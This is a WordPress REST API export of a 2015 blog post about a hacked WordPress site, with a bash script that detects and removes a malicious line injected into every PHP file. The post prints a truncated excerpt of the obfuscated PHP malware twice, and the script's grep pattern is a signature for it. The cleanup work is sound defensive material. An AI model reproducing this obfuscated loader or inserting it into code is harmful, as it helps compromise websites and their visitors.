{"id":3300,"date":"2015-03-07T02:17:07","date_gmt":"2015-03-07T02:17:07","guid":{"rendered":"http:\/\/www.deuzebranaweb.com.br\/?p=3300"},"modified":"2015-03-07T02:17:07","modified_gmt":"2015-03-07T02:17:07","slug":"wordpess-hackeado","status":"publish","type":"post","link":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/2015\/03\/07\/wordpess-hackeado\/","title":{"rendered":"WordPress hacked???"},"content":{"rendered":"<p><strong>Every WordPress PHP file has a strange line as its first line<\/strong>, similar to:<\/p>\n<pre>...if(!isset($GLOBALS[\"\\x61\\156\\x75\\156\\x61\"])) { $ua=strtolower($_SERVER[\"\\x48\\124\\x54\\120\\x5f\\125\\x53\\105\\x52\\137\\x41\\107\\x45\\116\\x54\"]); if ((! strstr($ua,\"\\x6d\\163\\x69\\145\")) and (! strstr($ua,\"\\x72\\166\\x3a\\61\\x31\"))) $GLOBALS[\"\\x61\\156\\x75\\156\\x61\"]=1; } ?&gt;&lt;?php $bqrdwxkbia = '2f#00;quui#&gt;.%x5c%x7825!&lt;***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x78277878&lt;~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x782:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D5c%x7860QUUI&amp;c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&amp;b%x5x5c%x78256&lt;*17-SFEBFI,6&lt;*127-UVPFNJU,6&lt;*27-SFGTOBSUOSV5c%x78257-K)fujs%x5c%x78#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%m%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!&lt;+x5c%x787f!&lt;X&gt;b%x5c%x7825Z&lt;#opo#&gt;b%x5c%x7825!*##&gt;&gt;X)!7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!&gt;!%x]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x7825-#1GO%x5c%x7x5c%x787f_*#[k2%x5c%x785c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnb160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%1627825h&gt;#]y31]278]y3e]81]K78:56985:6197g:756&lt;#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFHfgg($n){return chr(ord($n)-1);} 
@error_repo%x7825z&lt;jg!)%x5c%x7825z&gt;&gt;2*!%x5c%x7825z&gt;3&lt;!fmtf7fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~%x787f_*#ujojRk3%x5c%x7860{666~6%x5c%x7824]26%x5c%x7824-%x5c%x7824&lt;%x5c%x7825j,,*!|%{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osx5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x52qj%x5c%x7825)hopm3qjA)4985-rr.93e:5597f-s.973:8297f%57%x65\",\"%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut&gt;j%x5c%x7825!*9!%x5c%x7827!hudovg&lt;~%x5c%x7824&lt;!%x5c%x7825o:!&gt;!5c%x78256&lt;pd%x5c%x7825w6Z6&lt;.3%x5c%x7860hA%x5c%%x78257&gt;%x5c%x782272qj%x5c%x7825)7gj6&lt;**mpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!&lt;*#cd2bg&lt;!gps)%x5c%x7825j:&gt;1&lt;%x5c%x7825j:x7825j&gt;1&lt;%x5c%x78\\142\\x71\\162\\x64\\167\\x78\\153\\x62\\151\\x61\\51\\x29\\51\\x3b\\40\\x2f\\52\\x20\\144\\x63\\145\\x6b\\142\\x6d\\151\\x7a\\141\\x72\\40\\x2a\\57\\x20\"; $pnzewsvbvw=substr($bqrdwxkbia,(54629-44516),(45-33)); $pnzewsvbvw($wngtpqemdp, $mwgebagebq, NULL); $pnzewsvbvw=$mwgebagebq; $pnzewsvbvw=(506-385); $bqrdwxkbia=$pnzewsvbvw-1;...<\/pre>\n<p>Fix:<\/p>\n<pre>.\/remove_malware.sh \/var\/www\/wp_path\/<\/pre>\n<p>Clean:<\/p>\n<pre>.\/remove_malware.sh \/var\/www\/wp_path\/ clean<\/pre>\n<p>The script follows (you can also download it <a title=\"JavocSoft WordPress Malware Cleaner\" href=\"http:\/\/goo.gl\/ganzba\" target=\"_blank\">here<\/a>):<\/p>\n<pre>#!\/bin\/bash\n#\n# This script removes malware from PHP files.\n#\n# In this case it removes the malicious code\n# that sits at the top of every WordPress\n# PHP file.\n#\n# The string at the top of every file is:\n#\n# ... if(!isset($GLOBALS[\"\\x61\\156\\x75\\156\\x61\"])) { \n# $ua=strtolower($_SERVER[\"\\x48\\124\\x54\\120\\x5f\\125\\x53\\\n# 105\\x52\\137\\x41\\107\\x45\\116\\x54\"]); if ((! 
strstr($ua,\n# \"\\x6d\\16 ...\n# \n# (The PHP headers, and most of the line, have been \n# removed so that anti-virus software does not flag this script as a virus.)\n#\n# This script looks for the string inside $_SERVER\n# from the line above at the top of each file to determine\n# whether the file is infected. If you run the script and\n# nothing seems to be infected but you still suspect an\n# infection, open any WordPress PHP file and\n# check whether the malicious line is present. If it is\n# present but the script did not detect it, the\n# content inside $_SERVER may be different.\n# In that case, replace the string in the -e parameter\n# of the grep line in this script with the content of\n# $_SERVER found in your PHP file (remember to escape\n# the \\ with \\\\\\\\) and run this removal script again.\n#\n#\n# JavocSoft 2014\n#\nif [[ -z \"$1\" ]]; then\n echo \"A directory to search is required.\"\nelse\n grep -rnwl \"$1\" --include \\*.php -e \"\\\\\\\\x48\\\\\\\\124\\\\\\\\x54\\\\\\\\120\\\\\\\\x5f\\\\\\\\125\\\\\\\\x53\\\\\\\\105\\\\\\\\x52\\\\\\\\137\\\\\\\\x41\\\\\\\\107\\\\\\\\x45\\\\\\\\116\\\\\\\\x54\" | while IFS= read -r filename ; do\nif [[ ! -z \"$2\" ]]; then\n echo \"Found file $filename. 
Cleaning...\"\n # Strip everything on the infected line up to its last &lt;?php, keeping a .bck copy of the original\n awk 'BEGIN {matches=0} matches &lt; 1 &amp;&amp; \/1\/ { sub(\/^.*&lt;\\?php\/,\"&lt;?php\"); matches++ } { print $0 }' \"$filename\" &gt; \"$filename.purged\"\n mv \"$filename\" \"$filename.bck\"\n mv \"$filename.purged\" \"$filename\"\n else\n echo \"Found file $filename.\"\n fi\ndone\n echo \"Done.\"\nfi<\/pre>\n<p>http:\/\/javocsoft.es\/archives\/wordpress-hackeado-caso-y-desinfeccion\/945<\/p>\n<p>Program that causes this:<\/p>\n<p>http:\/\/memberdotmy.blogspot.com.br\/2012\/11\/webcruiser-web-vulnerability-scanner.html<\/p>\n<p>http:\/\/www.janusec.com\/<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Every WordPress PHP file has a strange line as its first line, similar to: &#8230;if(!isset($GLOBALS[&#8220;\\x61\\156\\x75\\156\\x61&#8221;])) { $ua=strtolower($_SERVER[&#8220;\\x48\\124\\x54\\120\\x5f\\125\\x53\\105\\x52\\137\\x41\\107\\x45\\116\\x54&#8243;]); if ((! strstr($ua,&#8221;\\x6d\\163\\x69\\145&#8243;)) and (! 
strstr($ua,&#8221;\\x72\\166\\x3a\\61\\x31&#8221;))) $GLOBALS[&#8220;\\x61\\156\\x75\\156\\x61&#8243;]=1; } ?&gt;&lt;?php $bqrdwxkbia = &#8216;2f#00;quui#&gt;.%x5c%x7825!&lt;***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x78277878&lt;~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x782:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D5c%x7860QUUI&amp;c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&amp;b%x5x5c%x78256&lt;*17-SFEBFI,6&lt;*127-UVPFNJU,6&lt;*27-SFGTOBSUOSV5c%x78257-K)fujs%x5c%x78#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%m%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!&lt;+x5c%x787f!&lt;X&gt;b%x5c%x7825Z&lt;#opo#&gt;b%x5c%x7825!*##&gt;&gt;X)!7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!&gt;!%x]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x7825-#1GO%x5c%x7x5c%x787f_*#[k2%x5c%x785c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnb160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%1627825h&gt;#]y31]278]y3e]81]K78:56985:6197g:756&lt;#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFHfgg($n){return chr(ord($n)-1);} @error_repo%x7825z&lt;jg!)%x5c%x7825z&gt;&gt;2*!%x5c%x7825z&gt;3&lt;!fmtf7fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~%x787f_*#ujojRk3%x5c%x7860{666~6%x5c%x7824]26%x5c%x7824-%x5c%x7824&lt;%x5c%x7825j,,*!|%{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osx5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x52qj%x5c%x7825)hopm3qjA)4985-rr.93e:5597f-s.973:8297f%57%x65&#8243;,&#8221;%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut&gt;j%x5c%x7825!*9!%x5c%x7827!hudovg&lt;~%x5c%x7824&lt;!%x5c%x7825o:!&gt;!5c%x78256&lt;pd%x5c%x7825w6Z6&lt;.3%x5c%x7860hA%x5c%%x78257&gt;%x5c%x782272qj%x5c%x7825)7gj6&lt;**mpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!&lt;*#cd2bg&lt;!gps)%x5c%x7825j:&gt;1&lt;%x5c%x7825j:x7825j&gt;1&lt;%x5c%x78\\142\\x71\\162\\x64\\167\\x78\\153\\x62\\151\\x61\\51\\x29\\51\\x3b\\40\\x2f\\52\\x20\\144\\x63\\145\\x6b\\142\\x6d\\151\\x7a\\141\\x72\\40\\x2a\\57\\x20&#8221;; 
$pnzewsvbvw=substr($bqrdwxkbia,(54629-44516),(45-33)); $pnzewsvbvw($wngtpqemdp, $mwgebagebq, NULL); $pnzewsvbvw=$mwgebagebq; $pnzewsvbvw=(506-385); $bqrdwxkbia=$pnzewsvbvw-1;&#8230; Fix: .\/remove_malware.sh \/var\/www\/wp_path\/ Clean: .\/remove_malware.sh&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_angie_page":false,"page_builder":"","footnotes":""},"categories":[18,20,19,7],"tags":[],"class_list":["post-3300","post","type-post","status-publish","format-standard","hentry","category-comandos-linux","category-linux","category-whmcapenel","category-wordpress"],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3300","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/comments?post=3300"}],"version-history":[{"count":0,"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3300\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/media?parent=3300"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/categories?post=3300"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.deuzebranaweb.com.br\/index.php\/wp-json\/wp\/v2\/tags?post=3300"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}